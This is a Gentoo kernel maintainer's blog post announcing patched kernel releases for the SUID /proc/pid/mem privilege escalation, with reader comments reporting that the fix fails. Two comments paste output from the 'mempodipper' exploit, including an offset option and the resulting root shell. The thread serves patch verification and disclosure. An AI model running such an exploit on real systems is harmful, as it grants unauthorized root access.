Mike Pagano's Weblog

Gentoo Kernel release for Linux Local Privilege Escalation via SUID /proc/pid/mem

January 23, 2012 4 Gentoo

I just released gentoo-sources-3.2.1-r1 for Linux Local Privilege Escalation via SUID /proc/pid/mem .

I plan on creating releases for additional kernels with this patch through the day.

See the link for more info on the privilege escalation.

The following kernel versions contain the patch:

gentoo-sources-3.2.1-r1

gentoo-sources-3.1.10

gentoo-sources-3.0.17-r1

 

4 Comments

  1. Oliver

    Hi,

    just emerged gentoo-sources-3.2.1-r1 and installed. tried the expoit and it still works:

    uname -a
    Linux mobilebox 3.2.1-gentoo-r1 #1 SMP Mon Jan 23 22:23:22 CET 2012 x86_64 Intel(R) Core(TM) i5 CPU M 480 @ 2.67GHz GenuineIntel GNU/Linux

    ./mempodipper
    ===============================
    = Mempodipper =
    = by zx2c4 =
    = Jan 21, 2012 =
    ===============================

    [+] Opening socketpair.
    [+] Waiting for transferred fd in parent.
    [+] Executing child from child fork.
    [+] Opening parent mem /proc/4024/mem in child.
    [+] Sending fd 5 to parent.
    [+] Received fd at 5.
    [+] Assigning fd 5 to stderr.
    [+] Reading su for exit@plt.
    [+] Resolved exit@plt to 0x402178.
    [+] Calculating su padding.
    [+] Seeking to offset 0x40216c.
    [+] Executing su with shellcode.
    sh-4.2# whoami
    root

    Cheers,

    Oliver

  2. Oliver

    Addtional info:
    seems like the patch is not applied:
    /usr/src $ diff linux-3.2.1-gentoo-r1/fs/proc/base.c linux-3.2.1-gentoo/fs/proc/base.c
    /usr/src $

    (just deny the posting of my comments on this blog…)

    Cheers,
    Oliver

  3. Yuri

    guv@noname ~/bin $ uname -a
    Linux noname.neo 3.1.10-gentoo #1 SMP Tue Jan 24 11:31:39 YEKT 2012 x86_64 Intel(R) Celeron(R) CPU E3300 @ 2.50GHz GenuineIntel GNU/Linux
    guv@noname ~/bin $ ./mempodipper -o 0x402178
    ===============================
    = Mempodipper =
    = by zx2c4 =
    = Jan 21, 2012 =
    ===============================

    [+] Opening socketpair.
    [+] Waiting for transferred fd in parent.
    [+] Executing child from child fork.
    [+] Opening parent mem /proc/10330/mem in child.
    [+] Sending fd 5 to parent.
    [+] Received fd at 5.
    [+] Assigning fd 5 to stderr.
    [+] Calculating su padding.
    [+] Seeking to offset 0x40215d.
    [+] Executing su with shellcode.
    sh-4.2# suid
    sh: suid: command not found
    sh-4.2# uid
    sh: uid: command not found
    sh-4.2# id
    uid=0(root) gid=0(root) groups=0(root),6(disk),10(wheel),18(audio),19(cdrom),27(video),46(plugdev),80(cdrw),85(usb),104(power),199(messagebus)
    sh-4.2# whoami
    root
    sh-4.2# exit
    exit

  4. noother

    I just upgraded to 3.2.1-r1 and unfortunately, the exploit still works.

Leave a Comment

Your email address will not be published. Required fields are marked *